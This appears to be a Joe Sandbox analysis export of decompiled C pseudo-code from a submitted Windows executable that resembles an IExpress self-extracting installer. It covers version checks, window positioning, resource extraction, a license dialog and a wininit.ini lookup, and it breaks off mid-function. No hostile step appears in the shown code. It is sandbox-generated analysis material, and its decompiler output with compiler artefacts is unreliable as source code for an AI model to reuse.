                                                • Opcode Fuzzy Hash: 550d4323dd1f25497eb959b3df04d7d9972837aa2832859f4a5c7fee1626825d
                                                • Instruction Fuzzy Hash: CC41F2345093855EEF17AF348C54AFE7BAD9F56310F1900DAE8C287202DB758E86CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E003828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                				void* _v8;
                                                				char* _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				int _v28;
                                                				char _v32;
                                                				void* _v36;
                                                				int _v40;
                                                				void* _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				long _t68;
                                                				void* _t70;
                                                				void* _t73;
                                                				void* _t79;
                                                				void* _t83;
                                                				void* _t87;
                                                				void* _t88;
                                                				intOrPtr _t93;
                                                				intOrPtr _t97;
                                                				intOrPtr _t99;
                                                				int _t101;
                                                				void* _t103;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                
                                                				_v12 = __edx;
                                                				_t99 = __ecx;
                                                				_t106 = 0;
                                                				_v16 = __ecx;
                                                				_t87 = 0;
                                                				_t103 = 0;
                                                				_v20 = 0;
                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                					L19:
                                                					_t106 = 1;
                                                				} else {
                                                					_t62 = 0;
                                                					_v8 = 0;
                                                					while(1) {
                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                						if(E00382773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                							goto L20;
                                                						}
                                                						_t11 =  &_v32; // 0x383938
                                                						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                						_v28 = _t68;
                                                						if(_t68 == 0) {
                                                							_t99 = _v16;
                                                							_t70 = _v8 + _t99;
                                                							_t93 = _v24;
                                                							_t87 = _v20;
                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                								goto L18;
                                                							}
                                                						} else {
                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                							if(_t103 != 0) {
                                                								_t73 = GlobalLock(_t103);
                                                								_v36 = _t73;
                                                								if(_t73 != 0) {
                                                									_t16 =  &_v32; // 0x383938
                                                									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                										L15:
                                                										GlobalUnlock(_t103);
                                                										_t99 = _v16;
                                                										L18:
                                                										_t87 = _t87 + 1;
                                                										_t62 = _v8 + 0x3c;
                                                										_v20 = _t87;
                                                										_v8 = _v8 + 0x3c;
                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                											continue;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										_t79 = _v44;
                                                										_t88 = _t106;
                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                										_t101 = _v28;
                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                										_t97 = _v48;
                                                										_v36 = _t83;
                                                										_t109 = _t83;
                                                										do {
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00382A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00382A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                											_t109 = _t109 + 0x18;
                                                											_t88 = _t88 + 4;
                                                										} while (_t88 < 8);
                                                										_t87 = _v20;
                                                										_t106 = 0;
                                                										if(_v56 < 0 || _v64 > 0) {
                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                												GlobalUnlock(_t103);
                                                											} else {
                                                												goto L15;
                                                											}
                                                										} else {
                                                											goto L15;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                				}
                                                				L20:
                                                				 *_a8 = _t87;
                                                				if(_t103 != 0) {
                                                					GlobalFree(_t103);
                                                				}
                                                				return _t106;
                                                			}

































                                                0x003828f1
                                                0x003828f4
                                                0x003828f7
                                                0x003828f9
                                                0x003828fc
                                                0x003828ff
                                                0x00382901
                                                0x00382907
                                                0x00382a62
                                                0x00382a64
                                                0x0038290d
                                                0x0038290d
                                                0x0038290f
                                                0x00382912
                                                0x00382920
                                                0x00382937
                                                0x00000000
                                                0x00000000
                                                0x0038293d
                                                0x00382944
                                                0x0038294a
                                                0x0038294f
                                                0x00382a2f
                                                0x00382a32
                                                0x00382a34
                                                0x00382a37
                                                0x00382a41
                                                0x00000000
                                                0x00000000
                                                0x00382955
                                                0x0038295e
                                                0x00382962
                                                0x00382969
                                                0x0038296f
                                                0x00382974
                                                0x0038297e
                                                0x0038298c
                                                0x00382a20
                                                0x00382a21
                                                0x00382a27
                                                0x00382a4c
                                                0x00382a4f
                                                0x00382a50
                                                0x00382a53
                                                0x00382a56
                                                0x00382a5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003829b2
                                                0x003829b2
                                                0x003829b5
                                                0x003829bd
                                                0x003829c3
                                                0x003829cc
                                                0x003829d5
                                                0x003829d7
                                                0x003829da
                                                0x003829dd
                                                0x003829df
                                                0x003829ec
                                                0x003829f8
                                                0x003829fc
                                                0x003829ff
                                                0x00382a02
                                                0x00382a07
                                                0x00382a0a
                                                0x00382a0f
                                                0x00382a19
                                                0x00382a81
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00382a0f
                                                0x0038298c
                                                0x00382974
                                                0x00382962
                                                0x00000000
                                                0x0038294f
                                                0x00382912
                                                0x00382a65
                                                0x00382a68
                                                0x00382a6c
                                                0x00382a6f
                                                0x00382a6f
                                                0x00382a7d

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00382A6F
                                                  • Part of subcall function 00382773: CharUpperA.USER32(B25159A8,00000000,00000000,00000000), ref: 003827A8
                                                  • Part of subcall function 00382773: CharNextA.USER32(0000054D), ref: 003827B5
                                                  • Part of subcall function 00382773: CharNextA.USER32(00000000), ref: 003827BC
                                                  • Part of subcall function 00382773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382829
                                                  • Part of subcall function 00382773: RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382852
                                                  • Part of subcall function 00382773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382870
                                                  • Part of subcall function 00382773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003828A0
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00383938,?,?,?,?,-00000005), ref: 00382958
                                                • GlobalLock.KERNEL32 ref: 00382969
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00383938,?,?,?,?,-00000005,?), ref: 00382A21
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00383938,?,?), ref: 00382A81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                • String ID: 898
                                                • API String ID: 3949799724-4089403422
                                                • Opcode ID: 0e7182a474b361a3eddf86aa08ba528772318132daaef1067dec419edd7066e0
                                                • Instruction ID: ae2cc59d964c28c2543e4a388cbf92902c816f83a6af35bda04058cf2c7a232a
                                                • Opcode Fuzzy Hash: 0e7182a474b361a3eddf86aa08ba528772318132daaef1067dec419edd7066e0
                                                • Instruction Fuzzy Hash: 45513C71D00319DFDB26EFA8C884AAEFBB9FF48700F1540AAE905E7211DB359941DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E003843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                				signed int _v8;
                                                				struct tagRECT _v24;
                                                				struct tagRECT _v40;
                                                				struct HWND__* _v44;
                                                				intOrPtr _v48;
                                                				int _v52;
                                                				intOrPtr _v56;
                                                				int _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				void* _t53;
                                                				intOrPtr _t56;
                                                				int _t59;
                                                				struct HWND__* _t63;
                                                				struct HWND__* _t67;
                                                				struct HWND__* _t68;
                                                				struct HDC__* _t69;
                                                				int _t72;
                                                				signed int _t74;
                                                
                                                				_t63 = __edx;
                                                				_t29 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t29 ^ _t74;
                                                				_t68 = __edx;
                                                				_v44 = __ecx;
                                                				GetWindowRect(__ecx,  &_v40);
                                                				_t53 = _v40.bottom - _v40.top;
                                                				_v48 = _v40.right - _v40.left;
                                                				GetWindowRect(_t68,  &_v24);
                                                				_v56 = _v24.bottom - _v24.top;
                                                				_t69 = GetDC(_v44);
                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                				ReleaseDC(_v44, _t69);
                                                				_t56 = _v48;
                                                				asm("cdq");
                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                				_t67 = 0;
                                                				if(_t72 >= 0) {
                                                					_t63 = _v52;
                                                					if(_t72 + _t56 > _t63) {
                                                						_t72 = _t63 - _t56;
                                                					}
                                                				} else {
                                                					_t72 = _t67;
                                                				}
                                                				asm("cdq");
                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                				if(_t59 >= 0) {
                                                					_t63 = _v60;
                                                					if(_t59 + _t53 > _t63) {
                                                						_t59 = _t63 - _t53;
                                                					}
                                                				} else {
                                                					_t59 = _t67;
                                                				}
                                                				return E00386CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                			}
























                                                0x003843d0
                                                0x003843d8
                                                0x003843df
                                                0x003843e6
                                                0x003843ec
                                                0x003843f1
                                                0x00384400
                                                0x00384403
                                                0x0038440b
                                                0x00384420
                                                0x00384429
                                                0x00384437
                                                0x00384444
                                                0x00384447
                                                0x0038444d
                                                0x00384454
                                                0x0038445b
                                                0x00384460
                                                0x00384461
                                                0x00384467
                                                0x0038446f
                                                0x00384473
                                                0x00384473
                                                0x00384463
                                                0x00384463
                                                0x00384463
                                                0x0038447a
                                                0x00384481
                                                0x00384484
                                                0x0038448a
                                                0x00384492
                                                0x00384496
                                                0x00384496
                                                0x00384486
                                                0x00384486
                                                0x00384486
                                                0x003844b8

                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 003843F1
                                                • GetWindowRect.USER32(00000000,?), ref: 0038440B
                                                • GetDC.USER32(?), ref: 00384423
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0038442E
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0038443A
                                                • ReleaseDC.USER32(?,00000000), ref: 00384447
                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003844A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceRect$Release
                                                • String ID:
                                                • API String ID: 2212493051-0
                                                • Opcode ID: a3cace097c11872d72f07a74473b50ad1e3efd084b392bdce7806ce3ea66b724
                                                • Instruction ID: 52d07f5ad30638eea30090d241d5b7b671f3e4285426ba138864d3e3ed4bfc29
                                                • Opcode Fuzzy Hash: a3cace097c11872d72f07a74473b50ad1e3efd084b392bdce7806ce3ea66b724
                                                • Instruction Fuzzy Hash: 15316271E00619AFDB15DFB8DD899EEBBB9EB89310F1541A9F805F7250DA30AC058B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00386298(intOrPtr __ecx, intOrPtr* __edx) {
                                                				signed int _v8;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				struct HINSTANCE__* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				struct HRSRC__* _t21;
                                                				intOrPtr _t26;
                                                				void* _t30;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr* _t40;
                                                				void* _t41;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				struct HINSTANCE__* _t51;
                                                
                                                				_t44 = __edx;
                                                				_t16 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t16 ^ _t50;
                                                				_t46 = 0;
                                                				_v32 = __ecx;
                                                				_v36 = 0;
                                                				_t36 = 1;
                                                				E0038171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                				while(1) {
                                                					_t51 = _t51 + 0x10;
                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                					if(_t21 == 0) {
                                                						break;
                                                					}
                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                					if(_t45 == 0) {
                                                						 *0x389124 = 0x80070714;
                                                						_t36 = _t46;
                                                					} else {
                                                						_t5 = _t45 + 8; // 0x8
                                                						_t44 = _t5;
                                                						_t40 = _t44;
                                                						_t6 = _t40 + 1; // 0x9
                                                						_t47 = _t6;
                                                						do {
                                                							_t26 =  *_t40;
                                                							_t40 = _t40 + 1;
                                                						} while (_t26 != 0);
                                                						_t41 = _t40 - _t47;
                                                						_t46 = _t51;
                                                						_t7 = _t41 + 1; // 0xa
                                                						 *0x38a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                						_t30 = _v32();
                                                						if(_t51 != _t51) {
                                                							asm("int 0x29");
                                                						}
                                                						_push(_t45);
                                                						if(_t30 == 0) {
                                                							_t36 = 0;
                                                							FreeResource(??);
                                                						} else {
                                                							FreeResource();
                                                							_v36 = _v36 + 1;
                                                							E0038171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                							_t46 = 0;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					return E00386CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                				}
                                                				goto L12;
                                                			}






















                                                0x00386298
                                                0x003862a0
                                                0x003862a7
                                                0x003862ad
                                                0x003862af
                                                0x003862bb
                                                0x003862c3
                                                0x003862c4
                                                0x0038633b
                                                0x0038633b
                                                0x00386345
                                                0x0038634d
                                                0x00000000
                                                0x00000000
                                                0x003862da
                                                0x003862de
                                                0x0038635f
                                                0x00386369
                                                0x003862e0
                                                0x003862e0
                                                0x003862e0
                                                0x003862e3
                                                0x003862e5
                                                0x003862e5
                                                0x003862e8
                                                0x003862e8
                                                0x003862ea
                                                0x003862eb
                                                0x003862ef
                                                0x003862f1
                                                0x003862f3
                                                0x00386302
                                                0x00386308
                                                0x0038630d
                                                0x00386314
                                                0x00386314
                                                0x00386316
                                                0x00386319
                                                0x00386355
                                                0x00386357
                                                0x0038631b
                                                0x0038631b
                                                0x00386331
                                                0x00386334
                                                0x00386339
                                                0x00000000
                                                0x00386339
                                                0x00386319
                                                0x0038636b
                                                0x0038637d
                                                0x0038637d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 003862CD
                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 003862D4
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 0038631B
                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00386345
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 00386357
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                • String ID: UPDFILE%lu
                                                • API String ID: 2922116661-2329316264
                                                • Opcode ID: 8fb951f66470f73829fcd8e64e7417b655164695ec023a04845692bdecb3c31e
                                                • Instruction ID: c7cd82c87d2599bddd62b66835d83f518cc6dc5a95a7b2c016b284d936d8da13
                                                • Opcode Fuzzy Hash: 8fb951f66470f73829fcd8e64e7417b655164695ec023a04845692bdecb3c31e
                                                • Instruction Fuzzy Hash: B221F675A00719ABDB12AF64DC4A9FE7B7CEB48710F04019AF902A7251DB759D028BE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00383A3F(void* __eflags) {
                                                				void* _t3;
                                                				void* _t9;
                                                				CHAR* _t16;
                                                
                                                				_t16 = "LICENSE";
                                                				_t1 = E0038468F(_t16, 0, 0) + 1; // 0x1
                                                				_t3 = LocalAlloc(0x40, _t1);
                                                				 *0x388d4c = _t3;
                                                				if(_t3 != 0) {
                                                					_t19 = _t16;
                                                					if(E0038468F(_t16, _t3, _t28) != 0) {
                                                						if(lstrcmpA( *0x388d4c, "<None>") == 0) {
                                                							LocalFree( *0x388d4c);
                                                							L9:
                                                							 *0x389124 = 0;
                                                							return 1;
                                                						}
                                                						_t9 = E00386517(_t19, 0x7d1, 0, E00383100, 0, 0);
                                                						LocalFree( *0x388d4c);
                                                						if(_t9 != 0) {
                                                							goto L9;
                                                						}
                                                						 *0x389124 = 0x800704c7;
                                                						L2:
                                                						return 0;
                                                					}
                                                					E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree( *0x388d4c);
                                                					 *0x389124 = 0x80070714;
                                                					goto L2;
                                                				}
                                                				E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x389124 = E00386285();
                                                				goto L2;
                                                			}






                                                0x00383a46
                                                0x00383a57
                                                0x00383a5d
                                                0x00383a63
                                                0x00383a6a
                                                0x00383a91
                                                0x00383a9a
                                                0x00383ad8
                                                0x00383b13
                                                0x00383b19
                                                0x00383b1b
                                                0x00000000
                                                0x00383b21
                                                0x00383ae7
                                                0x00383af4
                                                0x00383afc
                                                0x00000000
                                                0x00000000
                                                0x00383afe
                                                0x00383a87
                                                0x00000000
                                                0x00383a87
                                                0x00383aa8
                                                0x00383ab3
                                                0x00383ab9
                                                0x00000000
                                                0x00383ab9
                                                0x00383a78
                                                0x00383a82
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F64,?,00000002,00000000), ref: 00383A5D
                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00383AB3
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                  • Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285
                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00383AD0
                                                • LocalFree.KERNEL32 ref: 00383B13
                                                  • Part of subcall function 00386517: FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
                                                  • Part of subcall function 00386517: LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
                                                  • Part of subcall function 00386517: DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
                                                  • Part of subcall function 00386517: FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560
                                                • LocalFree.KERNEL32(00000000,00383100,00000000,00000000), ref: 00383AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                • String ID: <None>$LICENSE
                                                • API String ID: 2414642746-383193767
                                                • Opcode ID: 428da16e08a4c16e7eb20a5e0e24aa4c13d4ce6eff371ed917fcc0058ca06b44
                                                • Instruction ID: 0c6b60513924da75b0966608e14ddaee1faf5216e2334d995c2d3f8468ba821f
                                                • Opcode Fuzzy Hash: 428da16e08a4c16e7eb20a5e0e24aa4c13d4ce6eff371ed917fcc0058ca06b44
                                                • Instruction Fuzzy Hash: F511B170204301ABD727BB72AC09F277AADDBD5B00F1044EFB542DE6A0DA7989018760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E003824E0(void* __ebx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t7;
                                                				void* _t20;
                                                				long _t26;
                                                				signed int _t27;
                                                
                                                				_t20 = __ebx;
                                                				_t7 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t7 ^ _t27;
                                                				_t25 = 0x104;
                                                				_t26 = 0;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					E0038658A( &_v268, 0x104, "wininit.ini");
                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                					_t25 = _lopen( &_v268, 0x40);
                                                					if(_t25 != 0xffffffff) {
                                                						_t26 = _llseek(_t25, 0, 2);
                                                						_lclose(_t25);
                                                					}
                                                				}
                                                				return E00386CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                			}











                                                0x003824e0
                                                0x003824eb
                                                0x003824f2
                                                0x003824f7
                                                0x00382504
                                                0x0038250e
                                                0x0038251d
                                                0x0038252c
                                                0x00382541
                                                0x00382546
                                                0x00382553
                                                0x00382555
                                                0x00382555
                                                0x00382546
                                                0x0038256c

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00382506
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0038252C
                                                • _lopen.KERNEL32 ref: 0038253B
                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0038254C
                                                • _lclose.KERNEL32(00000000), ref: 00382555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                • String ID: wininit.ini
                                                • API String ID: 3273605193-4206010578
                                                • Opcode ID: 641cf5872dd5ff8335a1e9338a41c07dbb4cee642811133853c214b689a3b84a
                                                • Instruction ID: d70b3184fff7bed2b119729e921015ff8aeb8313197c9f4abf907dc5e7710d17
                                                • Opcode Fuzzy Hash: 641cf5872dd5ff8335a1e9338a41c07dbb4cee642811133853c214b689a3b84a
                                                • Instruction Fuzzy Hash: 4E0192726003186BD721AB659C09EDFBB7CDB46760F0001D5FA49D7190DA748E468B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E003836EE(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _OSVERSIONINFOA _v416;
                                                				signed int _v420;
                                                				signed int _v424;
                                                				CHAR* _v428;
                                                				CHAR* _v432;
                                                				signed int _v436;
                                                				CHAR* _v440;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t72;
                                                				CHAR* _t77;
                                                				CHAR* _t91;
                                                				CHAR* _t94;
                                                				int _t97;
                                                				CHAR* _t98;
                                                				signed char _t99;
                                                				CHAR* _t104;
                                                				signed short _t107;
                                                				signed int _t109;
                                                				short _t113;
                                                				void* _t114;
                                                				signed char _t115;
                                                				short _t119;
                                                				CHAR* _t123;
                                                				CHAR* _t124;
                                                				CHAR* _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				CHAR* _t135;
                                                				CHAR* _t138;
                                                				signed int _t139;
                                                
                                                				_t72 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t72 ^ _t139;
                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                				_t115 = __ecx;
                                                				_t135 = 0;
                                                				_v432 = __ecx;
                                                				_t138 = 0;
                                                				if(GetVersionExA( &_v416) != 0) {
                                                					_t133 = _v416.dwMajorVersion;
                                                					_t119 = 2;
                                                					_t77 = _v416.dwPlatformId - 1;
                                                					__eflags = _t77;
                                                					if(_t77 == 0) {
                                                						_t119 = 0;
                                                						__eflags = 1;
                                                						 *0x388184 = 1;
                                                						 *0x388180 = 1;
                                                						L13:
                                                						 *0x389a40 = _t119;
                                                						L14:
                                                						__eflags =  *0x388a34 - _t138; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L66;
                                                						}
                                                						__eflags = _t115;
                                                						if(_t115 == 0) {
                                                							goto L66;
                                                						}
                                                						_v428 = _t135;
                                                						__eflags = _t119;
                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                						_t11 =  &_v420;
                                                						 *_t11 = _v420 & _t138;
                                                						__eflags =  *_t11;
                                                						_v440 = _t115;
                                                						do {
                                                							_v424 = _t135 * 0x18;
